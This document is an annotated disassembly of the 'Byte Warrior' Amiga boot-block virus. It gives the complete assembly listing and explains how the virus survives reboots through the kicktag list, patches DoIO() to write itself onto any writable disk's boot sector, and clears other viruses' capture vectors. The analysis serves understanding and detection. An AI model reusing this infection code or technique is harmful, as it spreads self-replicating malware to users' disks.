; Boot sector header ; ------------------ 07F800 "DOS", 0 DOS boot disk signature. 07F804 64116DEC Checksum. 07F808 09D5A859 DOS reserved data. ; Bootstrap code ; -------------- ; The following code is the entry point of the boot block. First, ; it initializes the virus, then it boots up the DOS in the ; standard way. 07F80C movem.l D0-D7/A0-A6,-(SP) 07F810 bsr 07F840 Call virus initialization code. 07F814 movem.l (SP)+,D0-D7/A0-A6 ; DOS boot code. This looks for a resident module called ; "dos.library". If found, it returns 0 in D0 and the module's ; initialization code address in A0. If not found, it returns ; -1 (which would cause a guru). 07F818 lea 07F834,A1 Point to "dos.library". 07F81C jsr -$60(A6) FindResident() 07F820 tst.l D0 Found it? 07F822 beq 07F830 Exit if not. 07F826 move.l D0,A0 07F828 move.l $16(A0),A0 Get the initialization code address. 07F82C moveq #0,D0 Return 0 to indicate success. 07F82E rts 07F830 moveq #-1,D0 Return -1 to indicate error. 07F832 rts 07F834 "dos.library", 0 Name of DOS module. ; Virus initialization code ; ------------------------- ; First, copy the boot block to a "safe" (well, sort of) place, ; high up in chip memory at $7F800. The memory is not allocated, ; so if chip memory ever gets full, fireworks time. 07F840 move.l #$07F800,A0 Destination address. 07F846 lea 07F800,A1 Source address. 07F84A move.w #$FF,D0 07F84E move.l (A1)+,(A0)+ Copy 256 longwords (1 kilobyte). 07F850 dbra D0,07F84E ; Now unscramble the virus's secret message, and store the clear ; text at $7FC00. Nothing further is done with it. I have included ; the unscrambled text at the end of this disassembly. ; This is the entry point for re-activating the virus after a ; system reboot. 07F854 move.l #$07FA66,A0 Point to scrambled message. 07F85A move.l #$07FC00,A1 Where to put descrambled message. 07F860 move.w #$96,D0 Descramble 151 bytes. 07F864 move.b (A0)+,D1 Get a byte. 07F866 eor.b #$FF,D1 Flip all bits in it. 07F86A ror.b #3,D1 Rotate right by 3 bits. 07F86C move.b D1,(A1)+ Store at destination. 07F86E dbra D0,07F864 Loop until done. ; Finally, finish up by killing any other virus which may have ; survived the reboot. The usefulness of this is highly debatable, ; also, it probably won't kill all viruses out there. ; This looks at the ColdCapture and CoolCapture vectors in ExecBase, ; which less sophisticated viruses use to stay alive during ; reboots. If it finds either being non-zero, it calls the "killer" ; routine farther on. 07F872 tst.l $2A(A6) Test ExecBase->ColdCapture. 07F876 bne 07F882 Message if not zero. 07F87A tst.l $2E(A6) Test ExecBase->CoolCapture. 07F87E beq 07F888 Skip this if zero also. 07F882 jsr 07F8A8 Go clear the vectors. ; Hook the virus into the system. This involves putting it on ; the "kicktag" list to enable it to survive reboots, and patching ; the exec DoIO() vector so all I/O calls can be intercepted. 07F888 move.l 000004,A6 Get ExecBase. 07F88E move.l #$07F94C,$0226(A6) Point KickTagPtr to kicktag list. 07F896 jsr -$0264(A6) SumKickData() 07F89A move.l D0,$022A(A6) Fix the KickCheckSum. 07F89E move.l #$07F96E,-$01C6(A6) Change the DoIO() vector. 07F8A6 rts ; "Virus killer" code ; ------------------- ; This clears the ColdCapture and CoolCapture vectors in ExecBase ; to zero, fixes the checksum, flickers the power light, and plays ; a sound effect. In effect, it disconnects other viruses using ; these vectors to survive reboots, and brags if it has done so. ; This doesn't necessarily kill all other viruses, but it kills the ; less sophisticated ones. ; You can clobber one of these vectors (with Wack, a POKE from ; BASIC, etc..) while the virus is in the machine, and it will ; be reset to zero, accompanied by the power light flickering and ; a little sound effect. 07F8A8 clr.l $2A(A6) Kill ColdCapture vector. 07F8AC clr.l $2E(A6) Kill CoolCapture vector. 07F8B0 move.w #$17,D0 Fix ExecBase->ChkSum by adding up 07F8B4 lea $22(A6),A0 the static part of the ExecBase 07F8B8 clr.w D1 structure, then storing such a value 07F8BA add.w (A0)+,D1 in the checksum that if the whole 07F8BC dbra D0,07F8BA area, including checksum, is added 07F8C0 neg.w D1 up, the result is zero. 07F8C2 subq.w #1,D1 07F8C4 move.w D1,(A0) ; Flicker the power light 9 times very rapidly. 07F8C6 move.w #8,D1 Set up to loop 9 times. 07F8CA move.b #2,BFE001 Set the power light to dim. 07F8D2 move.w #$3000,D0 07F8D6 dbra D0,07F8D6 Delay. 07F8DA move.b #0,BFE001 Set the power light to bright. 07F8E2 move.w #$3000,D0 07F8E6 dbra D0,07F8E6 Delay. 07F8EA dbra D1,07F8CA Loop. ; Play a sound effect. 07F8EE move.l #$07FA62,DFF0D0 Set up AUD3LC. 07F8F8 move.w #2,DFF0D4 Set up AUD3LEN. 07F900 move.w #$3F,DFF0D8 Set up AUD3VOL. 07F908 move.w #$8008,DFF096 Enable Audio channel 3 DMA. ; Play 5 tones. A subroutine is used to store the current ; period value (determining frequency), and delay a bit. 07F910 move.w #$0200,D0 Period #1. 07F914 jsr 07FA52 07F91A move.w #$0800,D0 Period #2. 07F91E jsr 07FA52 07F924 move.w #$0400,D0 Period #3. 07F928 jsr 07FA52 07F92E move.w #$0280,D0 Period #4. 07F932 jsr 07FA52 07F938 move.w #$0200,D0 Period #5. 07F93C jsr 07FA52 07F942 move.w #8,DFF096 Disable Audio channel 3 DMA. 07F94A rts ; The kicktag list ; ---------------- ; This consists of pointers to all resident modules which should ; survive a reboot, terminated by a zero. In this case, there is ; just one, and its RomTag follows. 07F94C 0007F954 00000000 ; The virus's RomTag ; ------------------ ; This RomTag is added to system lists so that it will be in the ; resident module list after a reboot (there are comments in the ; 1.2 "exec/execbase.h" file which explain how this works). Since ; its RTF_COLDSTART flag is set, it will be run automatically after ; a reboot. The last field indicates where to jump to at that time. 07F954 4AFC RTC_MATCHWORD. 07F956 0007F954 Pointer back to matchword. 07F95A 0007FC00 Pointer to end of resident module. 07F95E 01 Flags (RTF_COLDSTART). 07F95F 21 Version (33). 07F960 00 Type (not used). 07F961 FF Priority (-1). 07F962 00000000 Name (not used). 07F966 00000000 IdString (not used). 07F96A 0007F854 Initialization code address. ; DoIO() patch ; ------------ ; The ExecBase jump vector is patched so all DoIO() calls end up ; here. First, this code looks if some other code has patched itself ; into the ExecBase ColdCapture or CoolCapture vectors. If so, ; it resets the vectors, with appropriate fanfare. ; After it has done this, the virus takes care of propagating itself ; onto other disks. It does this by intercepting I/O commands which ; meet all the following criteria: ; ; - Read or write command. ; - 512 or 1024 bytes. ; - At offset zero (sector zero). ; - Data location not zero. ; - Disk being accessed not write protected. ; ; If all these conditions are met (strangely, the code never checks ; if this is actually floppy disk I/O, which could lead to trouble ; with hard disks, serial ports, etc), then the virus inserts an ; extra I/O command just ahead of the real one, which writes the ; virus out into the boot block. 07F96E tst.l $2A(A6) Test the ColdCapture vector. 07F972 bne 07F97E Do the "killer" thing if not zero. 07F976 tst.l $2E(A6) Test the CoolCapture vector. 07F97A beq 07F984 Branch if also zero. 07F97E jsr 07F8A8 Do the "killer" thing. ; Check if the I/O command is of a suitable type (read or write). 07F984 cmp.b #3,$1D(A1) Is this a write command? 07F98A beq 07F998 07F98E cmp.b #2,$1D(A1) If not, is it a read command? 07F994 bne 07FA4C If neither, exit. ; Check if the length is suitable (1 or 2 disk sectors). 07F998 cmp.l #$000200,$24(A1) Is it for 512 bytes? 07F9A0 beq 07F9B0 07F9A4 cmp.l #$000400,$24(A1) If not, is it for 1024 bytes? 07F9AC bne 07FA4C If neither, exit. ; Check if the location is right (block zero). 07F9B0 tst.l $2C(A1) Check the I/O offset. 07F9B4 bne 07FA4C Exit if not. ; Check that the data location is not zero. 07F9B8 tst.l $28(A1) 07F9BC beq 07FA4C Exit if data location is zero. ; Save relevant fields of the I/O request. 07F9C0 move.w $1C(A1),07F7EC Save the I/O command. 07F9C8 move.l $28(A1),07F7E4 Save the data address. 07F9D0 move.l $2C(A1),07F7E8 Save I/O offset. 07F9D8 move.l $24(A1),07F7E0 Save the number of bytes. 07F9E0 move.l $20(A1),07F7F0 Save the io_Actual field. ; Make sure the disk isn't write protected. 07F9E8 move.l $18(A1),A0 Get the io_Unit field. 07F9EC move.b $41(A0),BFD100 Select the correct disk drive. 07F9F4 btst #3,BFE001 Test the write protect signal. 07F9FC beq 07FA4C Exit if write protected. ; Finally, modify the I/O request to write the virus to disk. 07FA00 move.l #$07F800,$28(A1) Set data address to virus code. 07FA08 move.w #3,$1C(A1) Specify write command. 07FA0E move.l #$000400,$24(A1) Specify 1024 bytes (2 sectors). 07FA16 move.l #0,$2C(A1) Specify offset zero (sector 0). ; Naughty, naughty. This jumps straight into the 1.2 ROMs. It's ; guaranteed to blow up if the ROM is changed. 07FA1E jsr FC06DC Perform the I/O. ; Restore the original I/O request values. . 07FA24 move.w 07F7EC,$1C(A1) Restore the I/O command. 07FA2C move.l 07F7E4,$28(A1) Restore the data address. 07FA34 move.l 07F7E8,$2C(A1) Restore the I/O offset. 07FA3C move.l 07F7E0,$24(A1) Restore the number of bytes. 07FA44 move.l 07F7F0,$20(A1) Restore the io_Actual field. ; Exit and perform the user's I/O by jumping to the real DoIO() ; function in the 1.2 ROM. 07FA4C jmp FC06DC ; Subroutine used for the sound effect. 07FA52 move.w D0,DFF0D6 Store the period. 07FA58 move.w #$A000,D0 07FA5C dbra D0,07FA5C Delay briefly. 07FA60 rts ; Audio waveform used for the sound effect. 07FA62 7F, 7F, 80, 80 ; Scrambled "secret" message ; -------------------------- ; This is scrambled so people casually looking at the boot block ; of a disk with a sector editor won't notice it's there. 07FA66 4DB46C54 64FEDCD4 5CD4E45C 846CFEEC 07FA76 34FE5CBC D4FE94B4 C4BC5C34 FEED345C 07FA86 D4FE45F4 6C6CB484 6CF6F6F6 FE7D9CD4 07FA96 F464D49E FE7C9CD4 F464D49E FE7C9CD4 07FAA6 F464D4FE DC848CC6 5CFEB48C 645CF49C 07FAB6 9CFE5CBC B464FEDC B464A49E FEE4842C 07FAC6 FEB5FE44 F48C5CFE 5C84FE5C 6CF44CD4 07FAD6 9CF6FE65 7C6CD4F4 DCFE5CBC D4FEEC84 07FAE6 845CEC9C 84E4A4FE F48CDCFE 5CBCD4FE 07FAF6 44846CDC F6FEFF ; The data above unscrambles into the following: "Virus detector by the mighty Byte Warrior!!!" "Please, please, please don't install this disk," "coz I want to travel! Spread the bootblock and the word!" ; The end. The rest of the boot block is filled with zeros.